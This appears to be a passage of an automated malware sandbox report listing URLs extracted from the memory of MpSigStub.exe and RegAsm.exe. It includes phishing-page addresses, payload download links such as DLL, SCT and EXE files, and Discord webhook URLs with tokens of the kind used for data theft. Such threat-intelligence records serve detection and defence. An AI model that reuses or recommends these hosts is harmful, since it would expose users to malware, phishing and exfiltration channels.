Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://dhl24.com.uk/
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	String found in binary or memory: https://diarnondfireplace.com/dobo/xxx.php?user=
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: https://dichthuatsnu.com/goodweb/pwofiles.php
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: https://diplomaticroll.com/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://diproelec.com.sv/moollll/excelzz
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/api/webhooks/
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/api/webhooks/770716126988599316/o7GXYebuPQzx7RQFUD4cTOPMq2gGicypOMyNpFVQsIb9qyVW
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/api/webhooks/850115118066040833/lcFHGcD2eUjv1zEJO_Ped6EAVU7W44L8X3chfyx9YoIb7YBS
Source: MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/api/webhooks/x
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: https://discordapp.com/api/webhooks/757994001767989269/f3KGimlvr5nZDHyIVt3GF4iEkqvy-je8zsM6MPhPc54x0
Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	String found in binary or memory: https://divelpid.my/wp-content/themes/monolit/woocommerce/global/aaie6jbhso9.php
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: https://divineleverage.org/de.php
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: https://djdkduep62kz4nzx.onion.to/
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://dl.dropboxusercontent.com/s/e7q3947id2jl6ux/factura6.zip?dl=0
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://dl.dropboxusercontent.com/s/m6q5dhmjpfxes94/ps2.txt
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: https://dl.dropboxusercontent.com/u/611200196/scan637.pdf.htm
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: https://dlya-detey.site/emz/reportdhlnew2.php
Source: RegAsm.exe, 0000000A.00000002.7229587939.0000000001561000.00000004.00000020.sdmp	String found in binary or memory: https://doc-00-88-docs.googleusercontent.com/
Source: RegAsm.exe, 0000000A.00000003.2601345289.00000000015A3000.00000004.00000001.sdmp	String found in binary or memory: https://doc-00-88-docs.googleusercontent.com/I
Source: RegAsm.exe, 0000000A.00000003.2601345289.00000000015A3000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000003.2604940506.00000000015A3000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7230551454.0000000001592000.00000004.00000020.sdmp	String found in binary or memory: https://doc-00-88-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9gljef6k
Source: RegAsm.exe, 0000000A.00000002.7229587939.0000000001561000.00000004.00000020.sdmp	String found in binary or memory: https://doc-00-88-docs.googleusercontent.com/f
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://docs-eight-sable.vercel.app/
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/d/e/2pacx-1vtrc0l1v7hke7ebcnmumoqomoajhb5togg63zkisb68sj3z7lcmv9ndk
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/feeds/default/private/full?v=3
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/uc
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/uc?id=1hajtdasfuta6vew8d5gjkd_bhnd3pwmc
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/viewer?url=%s&embedded=true
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: https://docs.healthmade.org//tc.js
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: https://donmilps.com/fex/?email=
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/
Source: RegAsm.exe, 0000000A.00000002.7228491604.0000000001518000.00000004.00000020.sdmp, RegAsm.exe, 0000000A.00000003.2601345289.00000000015A3000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7226801339.0000000001370000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1VrytxuZ5ywXyvS_VdIFbNuH61tX5mQ4u
Source: RegAsm.exe, 0000000A.00000002.7228491604.0000000001518000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1VrytxuZ5ywXyvS_VdIFbNuH61tX5mQ4uI
Source: RegAsm.exe, 0000000A.00000003.2601345289.00000000015A3000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1VrytxuZ5ywXyvS_VdIFbNuH61tX5mQ4uIaMa0_LSClw63POwk
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?id=1fxj2_ITnq1Yb6QbXw3HncRuwFAB8wN47&export=download
Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp	String found in binary or memory: https://drp.su/
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: https://dumpitnow2138.com/
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: https://dumpster-server.herokuapp.com/manager/query
Source: MpSigStub.exe, 00000023.00000003.6286809278.0000028BD6A80000.00000004.00000001.sdmp	String found in binary or memory: https://dynafivecon.com/ds/26.gif
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	String found in binary or memory: https://e3g564rtdfg.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: https://ecombox.store/tbl_add.php
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: https://ecosym.cl/firmas/wp-error.php
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://eeyhh567.s3.eu-west-3.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: https://efishedo.info/?tag_id
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://elcoyotedesign.com/red1r3ct/base64email/zgfycmvulnboawxsaxbzqhnvdxrozxnzzxguywmudws=
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: https://eletrocoghi.com.br/drms/fert.html
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: https://elisegiordano.com/bwvsc2f5zwrac2hhcmtlewfzdwdhci5jb20=
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: https://emvoips.eononass.xyz/?e=%25
Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp	String found in binary or memory: https://en.czonediver.com/ds/0502.gif
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://english.cdfj.org/giremx.org.mx/excx/aw/passf.php?email=arai.kaoru
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: https://erpoweredent.at/3/zte.dll
Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp	String found in binary or memory: https://erythrocyte-gaskets.000webhostapp.com/ms/excelz/excelz/index.php?email=
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: https://esp.adnan.dev.hostingshouse.com/ds/151120.gif
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: https://esscorp.org/
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: https://etprimewomenawards.com/apply2/uploads/w_a/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://evolvingdesk.nl/GoogleAPI/vendor/symfony/polyfill-intl-normalizer/Resources/JsWPVLZw9qr9GFE.
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://excavationtrick.com/dir/
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://exploitbottom.com/dir/?code=
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: https://exploshot.com/24.gif
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: https://expressen.se/docprod/templates/bot_tjansteskrivelse.docx
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	String found in binary or memory: https://extranet.carlsonwagonlit.com/gdsscripts/
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://extraosseous.com/zik/
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	String found in binary or memory: https://f.coka.la/6wzxbj.sct
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: https://faithpays.sowetoinnovations.co.za/khro/php/continue1.php
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: https://faog.org.hk/scanner/overwatch.php
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: https://faxzmessageservice.club
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: https://fazadminmessae.info
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: https://fazalandsons.com.pk/wp-includes/ixr/class-ixr-base64.php
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	String found in binary or memory: https://feedbackportal.download/ecm/ibm/3173379797/converter.dot
Source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp	String found in binary or memory: https://ferra.xyz/glsdil.php
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: https://fersite24.xyz/sa2234332324if3g4f23.php
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: https://filedropper.com/main/
Source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmp	String found in binary or memory: https://fileshare24.top/3223if3g4f23.php
Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: https://filingrimm.com/ecm/ibm/3149569888/
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: https://filingrimm.com/ecm/ibm/3149569888/converter.dot
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: https://find-your-profithere11.com/?m=1&o=hybpdzu&t=yrcrt&u=lb8k605
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/relaxdaysun.appspot.com/o/g%20ct%206%20yg-u%2ff%20cr%20y
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://flopyrhnd.tk/pr/lan.php
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://flyaircario.com/i/post.php
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: https://folkloreeconomy.com/next.php
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: https://formspree.io/f/
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: https://fpvtunes.binaryprotectors.com/msreal/jreside
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: https://fqe.short.gy/
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://fqe.short.gy/gclxo6
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://fqe.short.gy/j7xs8j
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://fr-an1.link/?e=atloperat
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: https://frabey.de/templates/elsterwetter16b/images/system/hp.gf
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: https://freelanceranik.com/group.php
Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp	String found in binary or memory: https://friendoffishing.com//wp-content/themes/calliope/template-parts/wp_data.php
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://fs01n4.sendspace.com/dlpro/20fb7f511bc258709195b9ca0c6c258e/595e5d75/k6zafp/x6iu1omg_2_.zips
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: https://fs01n5.sendspace.com/dl/23da2e4841c1800d1954130c638d13c3/575d2f1645706e13/ooru9w/google%20ch
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: https://fslqzt.info/
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://fx.pb-invioce.online/?e=accounts
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://fx.pb-invioce.online/?e=info
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://fx.pb-invioce.online/?e=m.turqueto
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://gantiatiainzx.us-south.cf.appdomain.cloud/?bbre=zxoiasxz#/abrimvh-&
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: https://gaspee.info/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: https://gatipackers-movers.com/wp-content/plugins/(
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://geklne.com/extra/?code=cmljagfyzc5tyxjncmf2zubtzxryb2jhbmsucgxjlnvr
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: https://geoconsultantservices.com/some/next.php
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://get.adobe
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://gettraff.ru/
Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp	String found in binary or memory: https://gettraff.ru/aws?keyword=
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://gez.org.zw/errorpages/load/
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://gg.gg/ig6f0
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://ggtraff.ru/
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://giahanecuador.com/s/?login=
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: https://gidbasket.com/drms/ind.html
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: https://gist.githubusercontent.com/razdorhere
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: https://github-production-release-asset-2e65be.s3.amazonaws.com/512295
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: https://github-production-release-asset-2e65be.s3.amazonaws.com/68070804
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Alexuiop1337/Trojan-Downloader/raw/master/fee.exe
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Bendr0id/xmrigCC
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/JulianG97/TextEditor
Source: MpSigStub.exe, 00000023.00000003.6265722092.0000028BD77B8000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/bendr0id/xmrigcc
Source: MpSigStub.exe, 00000023.00000003.6265722092.0000028BD77B8000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/bendr0id/xmrigcc-amd
Source: MpSigStub.exe, 00000023.00000003.6265722092.0000028BD77B8000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/bendr0id/xmrigcc/
Source: MpSigStub.exe, 00000023.00000003.6265722092.0000028BD77B8000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/bendr0id/xmrigcchttps://github.com/bendr0id/xmrigcc-amdhttps://github.com/bendr0i
Source: MpSigStub.exe, 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/georgw777/
Source: MpSigStub.exe, 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/georgw777/MediaManager
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/nwoolls/multiminer
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/robertdavidgraham/masscan
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/robertdavidgraham/masscanx
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/samratashok/nishang
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: https://giversplusz2020.ddnsking.com/audio/amvlbmeuam9obkbqy3cub3jn
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: https://gmaax.in/wp-includes/
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: https://gmaax.in/wp-includes/blocks/embed/
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://gmaax.in/wp-includes/js/crop/reportcmacgm.php
Source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp	String found in binary or memory: https://go.wikitextbooks.info
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/5gdfwn
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/6bvmse)
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/t4wd4iscrobj.dll
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/yuzvvg
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: https://goodbyegraffitiseattle.com/jhjdhjd/files/index.php)
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: https://goodiebagkanvas.com/m/?login=ithelp
Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp	String found in binary or memory: https://goofy-davinci-6ad239.netlify.app/)/s/uri
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: https://gposervitech.com/wp-content/cgi-bins/files/office365html/office
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://grace-memorial-church.com/shares/share/fghjke77383oned/share
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: https://granelseeds.cl/wp-includes/js/ghost/countrysubjectip.php
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: https://griginet.com/ggassh/sshrod.php
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://gritodopovo.com.br/doc/reserva.wiz
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://gritodopovo.com.br/natalidade/new.wiz
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: https://gruasphenbogota.com/c74hwggxi/ka.html
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: https://gtec24.com/0mqp0yn6/kk.html
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://h9-mil.live/?e=anita.masyk
Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	String found in binary or memory: https://hamality.xyz
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: https://handrug.com.py/baterfly/aleacarte.php
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://hard10.authorizeddns.us/1?zved58il3scrobj.dll
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://hardshipaccompany.com/next.php
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://hardx2.mydad.info/1?ef8il3hesscrobj.dll
Source: MpSigStub.exe, 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp	String found in binary or memory: https://hastebin.com/raw/
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: https://hawkloger.shortcm.li/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: https://help-lolooo.cf/
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://hghfjklkjlk.dvgwrgwjrgkhowrg.gb.net/qwertyxls/zip/document.php
Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: https://hillsbed.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	String found in binary or memory: https://hitechceramics.com/
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: https://hitechceramics.com/ajo/processor.php
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: https://hitechceramics.com/egab/processor.php
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: https://hitechceramics.com/emzf/processor.php
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: https://hitechceramics.com/lin/processor.php
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	String found in binary or memory: https://hitechceramics.com/tism/processor.php
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	String found in binary or memory: https://hitecsec.org/wp-includes/js/reportdhlnew.php
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	String found in binary or memory: https://hjnkmjkm.duckdns.org/bb/sf-express.php
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://hk.sd-inhcice.online/?e=sylvie.nicol
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	String found in binary or memory: https://holidayinndarlingharbour-my.sharepoint.com/personal/dos_holidayinndarlingharbour_com_au/_lay
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: https://holisticxox.com/doc/check.doc
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: https://holisticxox.com/doc/payment.doc
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: https://hotel-harmonia.am/images/prettyphoto/login/redirect.php
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: https://houses43s.somdhouths.xyz/?e=
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: https://hrupd00t.rest/kgwdt5pthdawnnewibpybtyht/?i8kka7gioxp=c2f1zglhy2fyz29pddiwmebzyxvkawfjyxjnby5
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: https://htrzogrzers.com/wed/opo.php
